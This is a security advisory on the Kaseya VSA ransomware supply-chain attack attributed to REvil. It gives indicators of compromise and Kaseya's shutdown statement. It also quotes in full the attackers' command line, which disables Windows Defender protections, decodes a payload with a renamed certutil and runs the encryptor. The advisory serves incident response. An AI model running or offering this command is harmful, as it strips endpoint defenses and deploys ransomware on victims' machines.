Kaseya VSA Users Under Ransomware Attack. Kaseya is urging MSPs to shut down on-premises VSA servers immediately.
We have become aware of an urgent ransomware incident in progress affecting Kaseya VSA. The only way to prevent breaches is to block Kaseya VSA, whether you’re using the cloud or utilizing the solution internally. Kaseya is currently pushing a hotfix for this issue.
Kaseya provides IT management software to MSPs.
According to security researchers, a ransomware encryptor is being dropped to c:\kworking\agent.exe The VSA fix is being named “Kaseya VSA Agent Hot-fix” and at least two tasks are running:
“C:\WINDOWS\system32\cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
A digital copy of the encryptor is being digitally signed with a valid signature with this information:
Name: PB03 TRANSPORT LTD.
CN = Sectigo RSA Code Signing CAO = Sectigo LimitedL = SalfordS = Greater ManchesterC = GB
Serial #: 119acead668bad57a48b4f42f294f8f0
When the executable runs, these files are being dropped into the hardcoded path c:\Windows:
MsMpEng.exe– Named to impersonate the Windows Defender executable and hide the encryption process. (This executable usually runs in Program Files)
- MsMpEng Hash: sha256,33BC14D231A4AFAA18F06513766D5F69D8B88F1E697CD127D24FB4B72AD44C7A
- Mpsvc[.]dll Hash: sha256,8DD620D9AEB35960BB766458C8890EDE987C33D239CF730F93FE49D90AE759DD
Other files involved:
Additional information added 4:25 CT, Fri, Jul 2:
VSA user admin accounts are being disabled just moments before ransomware is being deployed. VSA security notifications indicated the “KEleveted######” account, which is an SQL user, performed this action. Evidence likely points to execution via SQL commands.
Digital Signature used by ransomware operators:
Name PB03 TRANSPORT LTD.
Issuer Sectigo RSA Code Signing CA
Serial Number 11 9A CE AD 66 8B AD 57 A4 8B 4F 42 F2 94 F8 F0
To enable preventing communications via the firewall, use Kaseya’s Cloud Addresses and Ports listing.
Based on forensic investigations of the intrusion, there are strong connections to the REvil ransomware group or affiliates. REvil has targeted at least 6 large MSPs through the supply-chain attack on Kaseya’s VSA servers.
Kaseya released this statement in regards to the VSA service, “We are experiencing a potential attack against the VSA that has been limited to a small
number of on-premise customers only as of 2:00 PM EDT today. We are in the process of investigating the root cause of the incident with an abundance of caution but we recommend that you IMMEDIATELY shutdown your VSA server until you receive further notice from us. It’s critical that you do this immediately, because one of the first things the attacker does is shut off administrative access to the VSA.”